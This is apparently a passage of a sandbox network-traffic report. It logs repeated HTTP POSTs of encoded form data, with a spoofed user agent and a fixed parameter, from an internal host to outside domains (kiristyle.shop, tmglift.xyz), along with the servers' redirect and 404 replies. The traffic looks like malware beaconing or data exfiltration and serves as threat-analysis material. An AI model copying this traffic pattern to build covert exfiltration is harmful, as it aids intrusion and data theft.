                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  67192.168.11.204987335.244.245.12180
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:51:17.985713005 CEST1134OUTPOST /x85c/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.kiristyle.shop
                                                                                  Origin: http://www.kiristyle.shop
                                                                                  Referer: http://www.kiristyle.shop/x85c/
                                                                                  Content-Length: 545
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 56 31 4f 6f 77 31 76 70 36 63 6e 4d 4b 6c 33 78 34 49 39 39 45 4c 67 77 37 56 34 53 58 52 41 2f 79 62 7a 39 6f 6a 45 69 6d 47 6b 69 48 78 74 51 30 36 33 38 6a 57 4b 7a 56 56 57 6f 4c 39 6c 77 6b 58 76 44 30 6d 43 4d 50 63 56 75 50 34 2f 4c 71 2b 41 35 49 6a 5a 7a 6a 4d 44 75 4f 50 55 74 35 68 78 58 4d 50 6f 46 6a 64 35 70 39 79 43 74 54 75 2f 57 77 59 57 78 6b 4c 4e 78 44 34 43 55 47 55 6a 71 4f 38 49 33 4a 4a 55 71 2f 38 58 45 66 56 63 65 66 4a 2f 61 67 49 7a 78 51 52 54 58 34 50 49 56 36 69 6b 33 74 68 42 54 50 76 69 33 2f 6b 61 6b 51 4d 6a 47 6b 6e 56 70 43 77 47 6f 2f 56 77 4d 6c 6e 75 6a 44 4b 76 4a 55 46 4b 4f 48 75 61 41 5a 72 68 67 79 53 47 75 52 45 66 4c 57 6d 76 6a 65 69 70 58 31 59 51 30 69 4f 6a 76 36 5a 54 6f 35 38 2f 37 50 57 74 73 61 70 65 69 4e 49 79 62 55 41 78 4d 65 47 46 54 2f 4b 64 51 39 47 77 79 53 77 4e 56 51 74 48 70 75 67 4e 4b 74 79 64 46 70 67 34 54 41 63 38 32 4b 66 76 4e 57 52 55 32 6c 56 43 4c 77 75 4f 6f 4d 6a 75 6a 68 76 50 35 65 54 64 63 4e [TRUNCATED]
                                                                                  Data Ascii: AvLLLbOh=V1Oow1vp6cnMKl3x4I99ELgw7V4SXRA/ybz9ojEimGkiHxtQ0638jWKzVVWoL9lwkXvD0mCMPcVuP4/Lq+A5IjZzjMDuOPUt5hxXMPoFjd5p9yCtTu/WwYWxkLNxD4CUGUjqO8I3JJUq/8XEfVcefJ/agIzxQRTX4PIV6ik3thBTPvi3/kakQMjGknVpCwGo/VwMlnujDKvJUFKOHuaAZrhgySGuREfLWmvjeipX1YQ0iOjv6ZTo58/7PWtsapeiNIybUAxMeGFT/KdQ9GwySwNVQtHpugNKtydFpg4TAc82KfvNWRU2lVCLwuOoMjujhvP5eTdcNeeso3nwQg3fHqZPQ2eOdlYsla0HDweG7Nd8F1Y4fZpUxkjgPSgGAAgf6W8DXL19e8UQaHbkaWPsgo7vrBM4xZ1WQykKG2Tzdpm3c4+k8ZBm86dtvooBWF4BouD0zCrqu0F7gYn5dtPVatS3Ca8yaPlbj/vmqZjm1NgHlSBbZLqMWKfrF2yO9R9M/niXs+0urXzddjI7J88Tu9c=
                                                                                  Aug 27, 2024 17:51:18.154844046 CEST357INHTTP/1.1 301 Moved Permanently
                                                                                  Server: nginx
                                                                                  Date: Tue, 27 Aug 2024 15:51:18 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 162
                                                                                  Connection: close
                                                                                  Location: https://www.kiristyle.shop/x85c/
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  68192.168.11.204987435.244.245.12180
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:51:20.611572027 CEST2578OUTPOST /x85c/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.kiristyle.shop
                                                                                  Origin: http://www.kiristyle.shop
                                                                                  Referer: http://www.kiristyle.shop/x85c/
                                                                                  Content-Length: 52933
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 56 31 4f 6f 77 31 76 70 36 63 6e 4d 4b 6c 33 78 34 49 39 39 45 4c 67 77 37 56 34 53 58 52 41 2f 79 62 7a 39 6f 6a 45 69 6d 47 38 69 48 6b 35 51 7a 72 33 38 69 57 4b 7a 4a 6c 57 70 4c 39 6c 58 6b 58 6e 35 30 6d 48 35 50 66 74 75 4f 70 76 4c 71 4d 34 35 44 7a 5a 79 76 73 44 6f 4b 50 56 32 35 68 39 35 4d 4d 55 56 6a 74 6c 70 38 78 32 74 43 4e 6e 4a 79 49 57 33 6b 4c 4e 74 4f 59 44 70 47 55 33 36 4f 38 30 33 4a 4c 67 71 35 4f 76 45 5a 45 63 65 57 35 2f 5a 6d 34 7a 79 5a 78 53 74 34 50 63 42 36 69 6b 34 74 6c 35 54 50 73 47 33 38 6e 69 6e 52 73 6a 47 36 33 56 71 51 41 4b 73 2f 55 59 55 6c 6d 71 6a 44 4e 54 4a 56 6c 4b 4f 52 63 79 44 64 4c 68 6d 32 53 48 34 41 55 6a 44 57 69 48 64 65 6e 35 58 32 6f 55 30 74 5a 50 76 38 34 54 6f 77 38 2f 75 44 47 73 32 52 4a 65 2b 4e 4d 57 68 55 41 52 36 65 45 4a 54 75 61 39 51 33 43 6b 74 47 67 4d 51 4a 74 48 34 6b 41 42 47 74 7a 73 61 70 67 35 4f 41 5a 63 32 4a 76 2f 4e 58 55 67 31 6e 46 43 41 39 4f 50 77 43 7a 69 54 68 73 71 32 65 53 6c 71 4e [TRUNCATED]
                                                                                  Data Ascii: AvLLLbOh=V1Oow1vp6cnMKl3x4I99ELgw7V4SXRA/ybz9ojEimG8iHk5Qzr38iWKzJlWpL9lXkXn50mH5PftuOpvLqM45DzZyvsDoKPV25h95MMUVjtlp8x2tCNnJyIW3kLNtOYDpGU36O803JLgq5OvEZEceW5/Zm4zyZxSt4PcB6ik4tl5TPsG38ninRsjG63VqQAKs/UYUlmqjDNTJVlKORcyDdLhm2SH4AUjDWiHden5X2oU0tZPv84Tow8/uDGs2RJe+NMWhUAR6eEJTua9Q3CktGgMQJtH4kABGtzsapg5OAZc2Jv/NXUg1nFCA9OPwCziThsq2eSlqNfaspXnwVHrYNaZUdWeQeVZzlaJuDxa468B8EFo4IZpT1EjkBygMKggf6WByXLx9dIYQbwXkRnPsio7trBMTxZp1QycgGyvNdv23dpOkvtVh4Kdorooacl0Woqq7zC7UuD17hY35XNPWRdS8Fa9xQvpfj/zYqYX21KcHlUw5C4GVHZrXZFGF2hRE4EWI8YwehAr0TQsVSNs7w6zaUxlFwZhvqwGmL0qZRFZ9Hcth4OzKFvKtW16UA3X6Xrd1DnjkGj1uSf0ctbFnkMVMQZ8Pop8VzekJvrlS9oYHj57NcBB4p8y4sRIvD81FvIQ7N7fvHn0iS8NDKqJHCMWB6j/ht7jhLVVWUN/zENP3MF1h8Fa4JYloDKUUOrjtuExj0x8n8dgawwlhOD3E+drgh6yeItSLwQ1nWptjS0IJ3p0iQJ3/NWkp212G5wYzQmNM6se0hpCq+9RTseYrJBosj8NV7q32X+/x/XrK32bFK5NxewFAETdTqN3XhhLnvwJH3DD+zvaXAXiRkLNGwWpLRwYEkEx70599NA+4Thgqyj3+Vu66K0g4Wo1gXeCyr2BH0mms0HOSF8pLoWgMwY7JSV7qRxPLDBrlJp8DgFvvcX3yhERLnru2ZPN3vgDIYv63sKmyQVmDCFuDsUrJX2qKDPQE9QeQKsFDHdXVTeD [TRUNCATED]
                                                                                  Aug 27, 2024 17:51:20.611654043 CEST10312OUTData Raw: 44 79 51 72 6d 6f 56 6e 7a 4e 37 70 2b 70 52 2b 43 51 76 6a 6e 49 48 70 6b 33 63 72 38 62 49 4a 62 7a 50 57 4c 4f 70 79 64 38 42 31 38 63 71 2b 2f 6c 61 53 4b 39 74 48 50 56 77 46 56 68 72 2b 44 44 41 72 6a 32 2f 2b 39 62 76 2b 2b 68 52 38 7a 6a
                                                                                  Data Ascii: DyQrmoVnzN7p+pR+CQvjnIHpk3cr8bIJbzPWLOpyd8B18cq+/laSK9tHPVwFVhr+DDArj2/+9bv++hR8zj79rvEMY27xFJ23kT/z5TT2s+hCOEGAE8Wgc9XDWA9kGpiIBVSd61nhCG6P/ptzps3e8JF8CsMDYgKvVpsb8vESWRQT/Rg0twgUVFs/GKti2FuHY+cBAa3wdVfysu7s9OBb2SizhDWxZy49ugCcjcORENr4G1XbQOV
                                                                                  Aug 27, 2024 17:51:20.709819078 CEST1289OUTData Raw: 5a 69 35 50 4b 76 70 62 6c 44 64 2b 62 66 71 6b 42 46 71 6d 4e 38 4b 38 2f 70 72 36 68 5a 48 70 58 4e 37 41 37 70 57 4d 61 77 39 69 66 48 48 44 34 56 7a 69 53 6a 6e 4f 71 61 39 69 34 65 74 57 56 63 48 6e 48 44 34 4c 59 75 5a 30 71 31 74 69 38 63
                                                                                  Data Ascii: Zi5PKvpblDd+bfqkBFqmN8K8/pr6hZHpXN7A7pWMaw9ifHHD4VziSjnOqa9i4etWVcHnHD4LYuZ0q1ti8cUvPq2GQrPaYO9pVxhncr8AhZS5RFuA8Ourn4XsC+BPST/egm04toyiwFnTeb+hwmPitOR4KcW4Q7xJxPYfelN0mwCZoIao/U3nMnuvMrWIPvRGcTRulGNw9UdJaqQRTmN3ycSyqTEuana9Sw9QoT8nNT7QKEHvSBc
                                                                                  Aug 27, 2024 17:51:20.709904909 CEST2578OUTData Raw: 47 4c 49 45 73 30 48 67 67 52 38 50 43 4d 68 37 48 62 48 74 55 42 50 6d 71 30 5a 73 76 45 35 44 30 44 56 6a 37 34 56 56 47 6a 64 34 38 64 34 52 53 39 56 38 58 6a 33 31 67 61 6c 44 66 33 4c 6a 56 65 63 2f 6a 36 72 4d 57 42 4d 4b 4d 73 38 4a 62 54
                                                                                  Data Ascii: GLIEs0HggR8PCMh7HbHtUBPmq0ZsvE5D0DVj74VVGjd48d4RS9V8Xj31galDf3LjVec/j6rMWBMKMs8JbT/Q2YWRYhY1LUqPb3qvKXd+S0OFfCTWRj1FTc1ujunv+6UPMqqD0h1v5xhAp9koU/lUTSyOyHuluFTFAQj42EJ3XLs506fQks16ax6rQAKgql784iqGPA+NtkM98tquUQ8o9Kh87teo+0SIe8NIPzgJyDuMIfWLa0o
                                                                                  Aug 27, 2024 17:51:20.709916115 CEST3867OUTData Raw: 55 4c 70 31 74 65 77 43 74 70 74 38 6e 39 42 43 5a 62 65 67 77 54 57 79 47 65 78 6d 46 76 46 4e 4f 6d 78 6d 47 2f 70 5a 75 69 5a 63 5a 32 6f 66 6d 6e 44 46 42 65 35 4e 45 4d 77 61 4a 74 5a 6e 44 53 4e 55 53 5a 4c 79 42 69 76 38 61 56 2b 32 4b 63
                                                                                  Data Ascii: ULp1tewCtpt8n9BCZbegwTWyGexmFvFNOmxmG/pZuiZcZ2ofmnDFBe5NEMwaJtZnDSNUSZLyBiv8aV+2Kc3BcGNtXHeMMyvutMqisDOguYYGbxMFkWhZzs+41FpWuIPRsfQuEY+3o1dv43C1ysQ7HQptIPgzJKlEV6/UveI3Had+3kCTG2Igywu4bI/oGUtGyT17jjpZnZ4dRjTRomWW4BTp2V+m7Q8dwyirnpo/sAkIkKmZXv7
                                                                                  Aug 27, 2024 17:51:20.710110903 CEST5156OUTData Raw: 6f 4d 47 68 59 59 59 69 50 78 77 62 2f 78 59 66 48 56 63 58 36 43 63 64 6d 66 64 32 36 38 6e 6f 5a 7a 73 30 7a 58 30 76 50 46 33 74 2b 4c 57 42 68 50 4b 65 58 78 50 70 4b 4d 59 59 6e 58 66 61 36 69 64 74 32 43 35 62 7a 4d 50 49 6f 44 78 57 69 61
                                                                                  Data Ascii: oMGhYYYiPxwb/xYfHVcX6Ccdmfd268noZzs0zX0vPF3t+LWBhPKeXxPpKMYYnXfa6idt2C5bzMPIoDxWiabzW7aHbmc0IaDfsE7LqO7eiiUIx7fI1ZLB2DwG0PxxC36pb2YgzB6dWz4Wo/hZdoyUDi40109X66S19bO6z07Ah8Y5+q/bYOoiFDPvfvB4hJhMpza58b1ulkw/0qwEOJmHtyYxRiHfnHTHx/dPsg3tSVU7alemcK4
                                                                                  Aug 27, 2024 17:51:20.710278034 CEST5156OUTData Raw: 52 35 41 5a 66 78 71 73 49 77 57 39 32 4a 43 6f 57 47 61 42 58 39 41 57 6c 64 6c 35 47 76 68 41 6a 66 30 63 43 39 76 46 41 41 55 67 70 4e 35 61 61 6d 4b 53 7a 53 54 6d 52 43 6e 6d 4e 67 52 35 37 69 32 6d 32 31 4a 42 44 37 45 35 6d 48 47 2b 2f 52
                                                                                  Data Ascii: R5AZfxqsIwW92JCoWGaBX9AWldl5GvhAjf0cC9vFAAUgpN5aamKSzSTmRCnmNgR57i2m21JBD7E5mHG+/RpUciDPpZSjKZSCzBQUrZ/l4sGEccyKKkmO3L2Ss0t/cPWHzlIBsXCA3qG4UO4Akc2ErlUj596n4bhDp5lEuTdzh+BTIQ5hHeY6T6DKYT7UpkqkNAVxkGDNfSWNRAl0DG5gXcuR/x2ta15QXA8td3EFDShjpNxC+wB
                                                                                  Aug 27, 2024 17:51:20.710448980 CEST1289OUTData Raw: 58 74 56 57 4c 49 45 71 72 35 4c 4f 7a 64 42 58 51 43 7a 78 63 38 58 6a 5a 39 67 4e 58 45 50 65 54 36 58 2f 6d 59 56 6c 56 41 6d 31 4a 52 79 4d 50 34 75 37 68 32 65 63 36 5a 42 65 45 50 31 43 52 51 52 62 57 55 74 74 68 57 70 65 37 45 64 5a 72 69
                                                                                  Data Ascii: XtVWLIEqr5LOzdBXQCzxc8XjZ9gNXEPeT6X/mYVlVAm1JRyMP4u7h2ec6ZBeEP1CRQRbWUtthWpe7EdZriedGcavkm/0RkjkKOshvX0cpPgyi7iUD8WKeYBJYMZd1PiI8CBRAHNQs6MSkc6RD6nkicYTI7bpucc0TItWsGOmQp8LuGtnSnqTDBeoYTT8pWPdVA5WVNLvnuSqLpE9NAjMlyjx7Q46IplvpdHk2uWvicFKfQqAvNq
                                                                                  Aug 27, 2024 17:51:20.710597038 CEST6445OUTData Raw: 57 50 42 56 36 44 42 35 37 31 77 72 58 48 39 2f 4b 64 79 36 52 38 30 4d 64 50 68 6c 4a 49 54 37 6a 4e 44 4a 35 72 59 70 59 54 37 69 47 54 6f 4c 5a 37 4c 59 49 36 49 58 54 7a 45 45 54 56 71 57 57 71 78 4b 7a 5a 79 6f 66 78 4c 41 77 4b 35 38 48 4f
                                                                                  Data Ascii: WPBV6DB571wrXH9/Kdy6R80MdPhlJIT7jNDJ5rYpYT7iGToLZ7LYI6IXTzEETVqWWqxKzZyofxLAwK58HO+ircsp/jDB+Bg7h0K8UZos8CmpYPG5irN2/FZDGLgMRMjDEFlZS9E1ZUISX06zNM53Yrt5jCm6u5J5mUMGWOSskVdWfzH7jcP2vVzgpYmS9gOKqIMyqEcbcuGF9VV6B0LuPynAmV8ZoSjJ7N3C999EbW8XOCpXjgA
                                                                                  Aug 27, 2024 17:51:20.780950069 CEST357INHTTP/1.1 301 Moved Permanently
                                                                                  Server: nginx
                                                                                  Date: Tue, 27 Aug 2024 15:51:20 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 162
                                                                                  Connection: close
                                                                                  Location: https://www.kiristyle.shop/x85c/
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                                                  Aug 27, 2024 17:51:20.807861090 CEST2578OUTData Raw: 50 77 49 6f 45 77 44 7a 54 56 76 74 36 59 50 76 77 2b 31 37 4a 41 6e 33 68 49 4c 6e 49 66 6c 35 2f 54 67 65 6c 53 4a 36 4e 6e 55 71 6e 53 58 6a 71 5a 6e 63 4d 4c 30 73 43 79 6c 44 67 34 30 49 53 33 6e 68 38 42 51 39 44 34 57 79 61 76 7a 55 61 79
                                                                                  Data Ascii: PwIoEwDzTVvt6YPvw+17JAn3hILnIfl5/TgelSJ6NnUqnSXjqZncML0sCylDg40IS3nh8BQ9D4WyavzUayz9+OEa/tU60A4b0huiG/C9sxzJsc92j62WCvFbFy4xcZu7WOKmBidr5J17wz/w8HmQGLFuV85JPQ/yG9Em4+FJM/8UYzwBQrt4m4eb5sftrXLEJv9n1HgXjDXPcYe4/GbBl5Y3ZZY48liAidcNZ3peoL7re71lmwe
                                                                                  Aug 27, 2024 17:51:20.808011055 CEST2578OUTData Raw: 76 61 79 6e 67 64 46 52 70 79 43 6c 48 6c 33 63 32 33 54 70 78 39 5a 4e 4d 68 6b 44 7a 59 79 35 4c 77 69 55 4d 78 51 64 51 68 6f 55 42 77 55 56 6b 5a 59 31 57 47 2b 51 49 66 30 37 50 39 55 61 70 73 34 58 46 38 6a 66 4b 51 4e 63 6d 49 57 63 74 6a
                                                                                  Data Ascii: vayngdFRpyClHl3c23Tpx9ZNMhkDzYy5LwiUMxQdQhoUBwUVkZY1WG+QIf07P9Uaps4XF8jfKQNcmIWctj0RDtN6TIXbFUIAsrbWlrARphiv/1iFVrj+qLIjWE7RniDTP8XEBx2IS00eCXusm6JMCgqzJEqd3AE7yi+5UMSZpCkenAMwbI96DqMzYNYBMqEquB2K3YwskOl/ZW2SMZkDOw08BOIeNjY2ALEAwNFntnqv++DXg5e


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  69192.168.11.204987535.244.245.12180
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:51:23.247764111 CEST527OUTGET /x85c/?AvLLLbOh=Y3mIzDGxysayARzY45AnHIIy2B4pc2sd+rPTtixWlkJfFxNC1K7RiT+8e26JUdxdhynJ2ADdGNEqJqOO4cICPBs0jMW0AIUC/yJyUu4ejJJDyAbCIM7A/9A=&7RB=66nPyLG8 HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.kiristyle.shop
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Aug 27, 2024 17:51:23.416874886 CEST500INHTTP/1.1 301 Moved Permanently
                                                                                  Server: nginx
                                                                                  Date: Tue, 27 Aug 2024 15:51:23 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 162
                                                                                  Connection: close
                                                                                  Location: https://www.kiristyle.shop/x85c/?AvLLLbOh=Y3mIzDGxysayARzY45AnHIIy2B4pc2sd+rPTtixWlkJfFxNC1K7RiT+8e26JUdxdhynJ2ADdGNEqJqOO4cICPBs0jMW0AIUC/yJyUu4ejJJDyAbCIM7A/9A=&7RB=66nPyLG8
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  70192.168.11.204987685.159.66.9380
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:51:28.654114008 CEST785OUTPOST /fu44/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.tmglift.xyz
                                                                                  Origin: http://www.tmglift.xyz
                                                                                  Referer: http://www.tmglift.xyz/fu44/
                                                                                  Content-Length: 205
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 42 6e 6a 62 43 64 47 31 37 62 41 77 43 52 76 4b 78 42 34 49 2b 65 54 4f 62 54 49 37 78 6b 5a 6e 71 6d 71 79 56 58 6b 52 64 44 73 49 46 43 39 53 50 78 79 6d 76 31 54 4b 2f 50 53 72 72 78 4a 6f 37 2f 7a 70 66 47 47 62 63 67 55 4e 50 74 33 78 39 53 6d 34 52 58 64 49 50 35 4f 2b 59 65 6c 72 75 59 6c 5a 75 51 6c 73 77 70 55 62 75 6a 63 4a 68 63 48 33 77 70 57 52 45 4c 63 68 62 41 4e 74 5a 55 44 6d 6a 4f 50 4a 55 65 49 30 51 48 59 31 59 7a 69 2b 54 6a 5a 30 43 65 38 52 33 76 51 2b 55 53 4c 46 55 63 55 41 44 6d 4d 63 67 4e 2b 5a 47 5a 67 72 2f 56 58 46 71 32 78 34 4b 50 36 61 6d 67 3d 3d
                                                                                  Data Ascii: AvLLLbOh=BnjbCdG17bAwCRvKxB4I+eTObTI7xkZnqmqyVXkRdDsIFC9SPxymv1TK/PSrrxJo7/zpfGGbcgUNPt3x9Sm4RXdIP5O+YelruYlZuQlswpUbujcJhcH3wpWRELchbANtZUDmjOPJUeI0QHY1Yzi+TjZ0Ce8R3vQ+USLFUcUADmMcgN+ZGZgr/VXFq2x4KP6amg==
                                                                                  Aug 27, 2024 17:51:28.877273083 CEST225INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.14.1
                                                                                  Date: Tue, 27 Aug 2024 15:51:28 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  X-Rate-Limit-Limit: 5s
                                                                                  X-Rate-Limit-Remaining: 19
                                                                                  X-Rate-Limit-Reset: 2024-08-27T15:51:33.7673406Z


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  71192.168.11.204987785.159.66.9380
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:51:31.404109001 CEST1125OUTPOST /fu44/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.tmglift.xyz
                                                                                  Origin: http://www.tmglift.xyz
                                                                                  Referer: http://www.tmglift.xyz/fu44/
                                                                                  Content-Length: 545
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 42 6e 6a 62 43 64 47 31 37 62 41 77 45 77 2f 4b 68 57 6b 49 34 2b 54 4a 48 44 49 37 6f 55 5a 6a 71 6d 6d 79 56 57 78 4d 63 31 38 49 46 6a 4e 53 4f 77 79 6d 38 46 54 4b 71 2f 53 55 6d 52 4a 5a 37 2f 2f 58 66 48 36 62 63 67 41 4e 4f 65 2f 78 70 79 6d 35 46 48 64 50 49 35 4f 7a 53 2b 6c 68 75 59 70 2f 75 52 78 73 33 61 51 62 76 67 30 4a 79 35 7a 30 68 5a 57 58 43 4c 63 75 4f 77 4e 7a 5a 55 66 45 6a 4c 4c 5a 58 76 73 30 51 6d 34 31 4b 6a 69 39 62 54 5a 7a 4f 2b 38 46 2b 39 35 71 64 42 48 4d 48 39 30 4d 4b 45 38 47 72 36 71 70 43 6f 45 62 69 41 62 42 7a 79 4d 57 66 2b 75 53 35 72 6f 6b 44 4b 36 4e 62 59 42 37 75 72 34 74 53 69 54 30 43 61 72 64 6f 2f 35 38 39 41 64 75 2b 4c 58 62 46 41 45 47 38 46 74 4d 48 72 49 6e 41 37 68 4e 41 4e 49 57 43 72 73 78 44 65 31 62 7a 67 36 5a 4f 6e 74 65 4b 4c 34 34 5a 59 57 54 56 61 73 4d 61 56 32 4a 71 74 68 77 38 68 4b 77 61 73 6a 55 4d 76 2f 77 59 41 32 2b 33 47 4e 4f 47 77 71 49 30 51 4c 6a 68 42 43 52 36 55 43 43 6c 34 38 6a 77 4e 4f 54 46 [TRUNCATED]
